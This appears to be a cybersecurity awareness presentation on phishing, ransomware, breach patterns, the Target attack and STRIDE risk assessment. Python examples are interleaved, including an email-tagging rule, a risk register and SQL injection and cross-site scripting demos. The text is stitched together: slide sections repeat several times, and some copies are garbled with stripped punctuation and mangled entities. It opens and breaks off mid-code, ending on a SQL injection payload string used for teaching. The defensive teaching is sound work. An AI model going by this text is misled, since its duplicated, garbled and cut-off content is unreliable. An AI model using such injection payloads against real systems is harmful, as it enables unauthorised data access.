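    print("unsafe:", find_user_unsafe(conn, SQL_PROBE))   # both rows: WHERE was rewritten
    print("safe:  ", find_user_safe(conn, SQL_PROBE))     # []: no user has that literal name
    print(render_comment_unsafe("eve", HTML_PROBE))       # tag reaches the browser intact
    print(render_comment_safe("eve", HTML_PROBE))         # shown as text, not executed
```

The fix is the same in both cases: keep data and code apart at the boundary (bound parameters for SQL, output escaping for HTML) rather than trying to filter "bad" characters out of the input, which is the approach that routinely fails.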
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Common Vulnerabilities and Exposures (CVE) – Catalog sponsored by Homeland Security that documents known cyber threats. Vulnerabilities are known errors in a system or software that provide an attacker with direct access. Exposures are known errors that allow an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malware and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level.
Zero Day Vulnerability/Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by the vendor.
Advanced Persistent Threat – A set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Dark Web / Darknet – Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or credit card data as well as botnet rentals. Bitcoins are traded on the Dark web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that – along with all Bitcoin transactions – is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process – that is, the amount of computing power involved – increases.
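The "computationally difficult puzzle" in the Bitcoin definition above is a proof of work: find a number that makes a hash fall below a target, where checking a claimed answer costs one hash but finding it costs many. The toy below, an added illustration rather than the page's code or real Bitcoin (which double-hashes an 80-byte block header against a 256-bit target), makes the difficulty relationship concrete: each extra leading zero hex digit multiplies the expected search by 16. The block contents and the "previous hash" are constructed placeholders.

```python
"""Toy proof-of-work: why mining gets harder as difficulty rises.

Added illustration for the Bitcoin definition on this page. Not the page's own
code and not real Bitcoin's algorithm; the puzzle here is finding a nonce such
that SHA-256(prev_hash | data | nonce) starts with `difficulty` zero hex digits.
"""
import hashlib


def block_hash(prev_hash, data, nonce):
    """Hash of the candidate block; the nonce is the only field a miner varies."""
    return hashlib.sha256(f"{prev_hash}|{data}|{nonce}".encode()).hexdigest()


def mine(prev_hash, data, difficulty, max_tries=10_000_000):
    """Search nonces until the hash has `difficulty` leading zero hex digits.
    Returns (nonce, hash, tries); raises if the search limit is hit."""
    target = "0" * difficulty
    for nonce in range(max_tries):
        h = block_hash(prev_hash, data, nonce)
        if h.startswith(target):
            return nonce, h, nonce + 1
    raise RuntimeError("no solution within max_tries")


def verify(prev_hash, data, nonce, difficulty):
    """Checking a claimed solution costs one hash, however hard it was to find."""
    return block_hash(prev_hash, data, nonce).startswith("0" * difficulty)


def expected_tries(difficulty):
    """Each hex digit has 16 values, so the expected work is 16 ** difficulty."""
    return 16 ** difficulty


GENESIS = "0" * 64   # constructed placeholder for the previous block's hash

if __name__ == "__main__":
    for d in (1, 2, 3, 4):
        nonce, h, tries = mine(GENESIS, "constructed block data", d)
        print(f"difficulty={d} expected~{expected_tries(d):>6} tries={tries:>6} "
              f"nonce={nonce} hash={h[:12]}...")
```

The asymmetry is the point of the scheme: the network adjusts the difficulty so the expected search keeps taking about the same wall-clock time as more computing power joins, while every participant can still verify a block with a single hash.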
PHISHING
A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment.
Spear-Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of Spear Phishing include Cloning (using a previous legitimate email) and Whaling (attacking a high level executive).
• CEO Email to Treasurer
• HR Phishing for Employee Data
• W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment.
PHISHING
Most companies battle the increase in Phishing and spear-phishing attacks by labeling each external email with some form of the following inserts:
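The labeling the slide refers to is a mail-gateway rule: if the sending address is outside the company's domains, prefix the subject and prepend a banner so the reader sees the warning before acting on a message that looks internal (the "CEO Email to Treasurer" case on the previous slide). The following is an added example, not the page's or any gateway product's code; the company domains, the two messages, the lookalike domain and the banner wording are constructed assumptions, and the parsing is done with Python's standard email package.

```python
"""Tagging external email: the "[EXTERNAL]" insert the page describes.

Added example (not the page's code) of a gateway rule that labels mail from
outside the company. The company domains, the messages and the banner text are
constructed assumptions; Python's standard email package does the parsing.
"""
from email import message_from_string, policy
from email.utils import parseaddr

INTERNAL_DOMAINS = {"example.com", "corp.example.com"}   # assumed company domains
TAG = "[EXTERNAL]"
BANNER = ("CAUTION: This email originated from outside the organization.\n"
          "Do not click links or open attachments unless you recognize the sender.")

# Constructed messages. The second uses a display name that says "Chief
# Executive" over a lookalike domain, the whaling pattern the page describes.
INTERNAL_MAIL = """\
From: Pat Lee <pat.lee@example.com>
To: treasurer@example.com
Subject: Q4 budget

See attached draft.
"""
LOOKALIKE_MAIL = """\
From: Chief Executive <ceo@example-com.test>
To: treasurer@example.com
Subject: Urgent wire request

Please process the attached wire today.
"""


def sender_domain(msg):
    """Domain of the actual address in From:, ignoring the display name
    (a display name saying "CEO" proves nothing about where mail came from)."""
    _, addr = parseaddr(msg.get("From", ""))
    return addr.rpartition("@")[2].lower()


def is_external(msg):
    """External when the sender domain is missing or not one of ours."""
    domain = sender_domain(msg)
    return domain == "" or domain not in INTERNAL_DOMAINS


def classify_external(raw):
    return is_external(message_from_string(raw, policy=policy.default))


def label_external(raw):
    """Return the message text with the subject tag and body banner applied
    when the sender is external; internal or already-tagged mail is unchanged."""
    msg = message_from_string(raw, policy=policy.default)
    subject = msg.get("Subject", "")
    if not is_external(msg) or subject.startswith(TAG):
        return raw
    del msg["Subject"]
    msg["Subject"] = f"{TAG} {subject}".strip()
    msg.set_content(BANNER + "\n\n" + msg.get_content())
    return msg.as_string()


if __name__ == "__main__":
    print(label_external(INTERNAL_MAIL))
    print(label_external(LOOKALIKE_MAIL))
```

Two design points matter here: the decision is made on the address, never on the display name, because the display name is exactly what a spear-phisher controls; and a message already carrying the tag is left alone so that replies and forwards do not accumulate a stack of prefixes that people learn to ignore.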
MALWARE
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and now Ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts
• Ransomware is the latest version of Malware that has been in the headlines and represents one of the largest cyber threats to most companies
Source: Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
POINT-OF-SALE (POS) INTRUSIONS
• Attackers target the systems that capture customer payment card information during legitimate transactions
• Attacks can exploit POS software or hardware
• Attackers commonly target POS system vendors as a means to reach an organization's POS systems
• Retail and accommodation (hospitality) businesses are experiencing large-scale POS attacks
Source: Verizon Data Breach Investigations Report 2016
PRIVILEGE MISUSE
• Internal parties act (maliciously or not) in a way that causes a breach
• Most actors are outside executive management and leadership roles
• While financial gain still motivates most actors, espionage has become an increasingly common motivation
• Most of these breaches take months or longer to discover
Source: Verizon Data Breach Investigations Report 2016
CYBER-ESPIONAGE
• External parties (possibly state-affiliated or organized crime) infiltrating an organization's systems
• Attacks commonly begin with phishing and/or by exploiting vulnerabilities or backdoors in software (browsers, or even websites)
• Over 90% of cyber-espionage breaches target trade secrets for exfiltration
Source: Verizon Data Breach Investigations Report 2016
CRIMEWARE
• Crimeware covers any malware incident whose direct aim is financial gain
• Ransomware, keyloggers and the use of backdoors are the most common forms of crimeware
• Crimeware is typically introduced through the following:
- Email attachment
- Malicious script on a visited website (drive-by download)
- Email link
Source: Verizon Data Breach Investigations Report 2016
KEY CYBER ATTACKS IN THE NEWS
• Target data breach (2013) – 70 million PII records of customers and 40 million credit cards stolen
• Sony attack (2014) – malware attack that wiped over half of the company's servers and PCs, and released four unreleased movies and over 45,000 social security numbers
• Yahoo data breaches (2013/2014) – an August 2013 breach that exposed PII of 1 billion users and a separate 2014 breach of 500 million users, both disclosed in 2016
• Prepaid card / ATM cash-out scheme (2013) – $45 million stolen worldwide
• Bangladesh Bank (February 2016) – $81 million stolen
COMPLEXITY BEHIND THE TARGET ATTACK
• Cyber attackers first attacked a third-party vendor (the HVAC vendor) using malware introduced through a phishing campaign
• They used the HVAC vendor's stolen credentials to gain access to a vendor-facing website used for submitting electronic invoices
• They exploited a vulnerability in the electronic submission process to inject code and gain further access to Target's internal network
• They performed reconnaissance of the environment and obtained domain administrator access
• The attackers then worked their way through various servers, using a scanner to detect which other servers they could reach from their current position, and worked around firewalls and other defenses
• They gained access to a server that contained a SQL database and downloaded 70 million PII records of customers
• They then gained access to the POS environment (which should have been walled off from the corporate network)
• They went on the darknet to find someone with knowledge of the POS system and of how to inject code into the POS application
• They installed malware on certain POS servers that scanned memory and saved off credit card information, which sits unencrypted in the POS process while a transaction is being processed
• They then copied the credit card files to another server that had outbound FTP access and sent the files to themselves
RANSOMWARE – ANATOMY OF AN ATTACK
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a breach. The main reasons companies struggle are:
• Expansion of the attack surface
• Continued innovation in technology
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
• Lack of skilled resources (people and time)
• Lack of funds
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE | TECHNOLOGY | PROCESSES
THE PEOPLE CHALLENGE – Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE – The increasing sophistication and rate of attacks mean that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE – Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important.
IMPLEMENTING A CYBERSECURITY PROGRAM
• Understand the organizational risk and where high-risk assets exist
• Risk assessments should be performed annually or when significant changes to the environment occur
• Stinnett uses Microsoft STRIDE threat modeling (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege) to semi-qualitatively measure cybersecurity risks and to identify, estimate and prioritize information security risks
The steps: Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results
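The five steps above (identify assets, record their locations, classify them, model threats, calculate risk) are what a risk register implements. The following is an added example, not Stinnett's method or tooling: it walks a constructed asset list through the six STRIDE categories, scores each threat with an assumed rule (impact x likelihood x (1 - control strength)), ranks the results, and reports which STRIDE categories were never considered for an asset, which is the most common gap in a first-pass threat model. The assets, threats, classification scale and scoring rule are all assumptions.

```python
from enum import Enum
from typing import Dict, List, Tuple


class Stride(Enum):
    SPOOFING = "S"
    TAMPERING = "T"
    REPUDIATION = "R"
    INFORMATION_DISCLOSURE = "I"
    DENIAL_OF_SERVICE = "D"
    ELEVATION_OF_PRIVILEGE = "E"


# Assumed classification scale: impact 1 (public) to 4 (restricted).
IMPACT = {"Public": 1, "Internal": 2, "Confidential": 3, "Restricted": 4}


def score(impact: int, likelihood: int, control: float) -> float:
    """Assumed scoring rule: impact x likelihood x (1 - control strength).
    likelihood is 1..5; control strength is 0.0 (nothing in place) to 1.0 (fully mitigated)."""
    if not (1 <= likelihood <= 5 and 0.0 <= control <= 1.0):
        raise ValueError("likelihood must be 1..5 and control strength 0.0..1.0")
    return round(impact * likelihood * (1.0 - control), 2)


# Constructed asset register: asset -> (location, classification)
ASSETS = {
    "Cardholder database": ("Data centre, PCI segment", "Restricted"),
    "Vendor invoice portal": ("DMZ web tier", "Confidential"),
    "HR file share": ("Corporate LAN", "Internal"),
}

# Constructed threat model: asset -> [(STRIDE category, likelihood 1..5, control strength 0..1)]
THREATS = {
    "Cardholder database": [
        (Stride.INFORMATION_DISCLOSURE, 4, 0.4),
        (Stride.ELEVATION_OF_PRIVILEGE, 3, 0.5),
        (Stride.TAMPERING, 2, 0.7),
    ],
    "Vendor invoice portal": [
        (Stride.SPOOFING, 5, 0.1),      # vendor passwords only, no MFA: stolen credentials work
        (Stride.TAMPERING, 3, 0.6),
        (Stride.DENIAL_OF_SERVICE, 3, 0.8),
    ],
    "HR file share": [
        (Stride.INFORMATION_DISCLOSURE, 3, 0.5),
        (Stride.REPUDIATION, 2, 0.3),
    ],
}


def prioritized_risks(assets: Dict, threats: Dict) -> List[Tuple[str, str, float]]:
    """(asset, STRIDE category, score) rows, highest risk first."""
    rows = []
    for asset, (_location, classification) in assets.items():
        impact = IMPACT[classification]
        for category, likelihood, control in threats.get(asset, []):
            rows.append((asset, category.name, score(impact, likelihood, control)))
    return sorted(rows, key=lambda row: row[2], reverse=True)


def coverage_gaps(assets: Dict, threats: Dict) -> Dict[str, List[str]]:
    """STRIDE categories never considered for each asset; an empty dict means full coverage."""
    gaps = {}
    for asset in assets:
        considered = {category for category, _, _ in threats.get(asset, [])}
        missing = [category.name for category in Stride if category not in considered]
        if missing:
            gaps[asset] = missing
    return gaps


if __name__ == "__main__":
    for asset, category, risk in prioritized_risks(ASSETS, THREATS):
        location, classification = ASSETS[asset]
        print(f"{risk:5.1f}  {asset:22s} {category:24s} {classification:13s} {location}")
    print("not yet modelled:", coverage_gaps(ASSETS, THREATS))
```

With these assumed inputs the top risk is credential spoofing against the vendor portal rather than anything on the cardholder database itself, which mirrors the Target chain described earlier: the highest-classified asset is not necessarily where the weakest control sits. The coverage report is the check worth keeping even if the scoring rule changes; an asset with no entry for, say, elevation of privilege has not been threat-modelled, it has been skipped.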
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is understanding the company's information assets:
• What value do the assets have?
- Credit card data
- Employee or customer records
- Bank accounts
- Intellectual property
- Trade secrets
- Insider knowledge
• Who would want the data?
• Where is the data located?
BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design against commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
CYBERSECURITY FAILURES AND FIXES
Patch Management – A patch management process is a company's strategy for ensuring that its IT devices are properly updated (patched) with the latest software update or release from the vendor. Most companies fail to implement sound patch management processes and procedures:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the devices in their network and are therefore unable to adequately assess their patch management process
User and Administrator Level Access – Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied as far as possible. Within the IT department, a failure of least privilege can result in multiple individuals and IDs with access to, and/or knowledge of, higher-level functions in the environment.
User Cybersecurity Training and Awareness – Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the attacker's first entry point into the company.
CYBERSECURITY FAILURES AND FIXES
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe products, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password parameters are adequate (password length, character requirements and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and that backups are properly segregated from the systems they protect, so that ransomware cannot encrypt the backups along with the data
QUESTIONS
www.STINNETT-ASSOCIATES.com | 888-808-1795
Stinnett & Associates, 8811 S Yale Ave, Suite 300, Tulsa, OK 74137
Main Number: 918-728-3300
ContactUs@Stinnett-Associates.com
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Middleware – Software that facilitates the exchange of data between two application programs, within the same environment or across different hardware and network environments. The three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware.
Man-in-the-Middle (MITM) Attack – An attack in which the attacker has been able to place themselves in the middle of the communications between two parties. The attacker can read or alter the data passing between them without either party knowing.
SQL Injection and Cross-Site Scripting Attacks – Attacks in which the attacker injects malicious input into a website. In SQL injection, the attacker's input is built into a database query, so the attacker uses SQL to obtain information back from the website that was never intended to be exposed. In cross-site scripting, the attacker injects script into a page so that it runs in the browsers of other users of the website.
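As an added example for the two most common web application attacks named on the Web App Attacks slide and defined above (it is not code from the presentation), the block below puts a query built by string concatenation next to its parameterized version, and a page that reflects input unescaped next to one that escapes it. The user table, the payloads and the domain names are constructed for the demo.

```python
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample user table, in memory, standing in for the site's back-end database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "alice@example-corp.com", 1),
        ("bob", "bob@example-corp.com", 0),
    ])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Builds SQL by string concatenation: the attacker's input becomes part of the query text."""
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    """Parameterized query: the value travels separately from the SQL, so it can only ever be data."""
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def render_vulnerable(comment: str) -> str:
    """Reflects user input straight into HTML, so a script in one comment runs for every viewer."""
    return '<div class="comment">' + comment + '</div>'


def render_safe(comment: str) -> str:
    """Escapes <, >, &, and quotes so the browser treats the input as text, not markup."""
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'


# Constructed payloads. The first turns the WHERE clause into a tautology; the second
# would send every viewer's session cookie to an attacker-controlled host.
SQLI_PAYLOAD = "' OR '1'='1"
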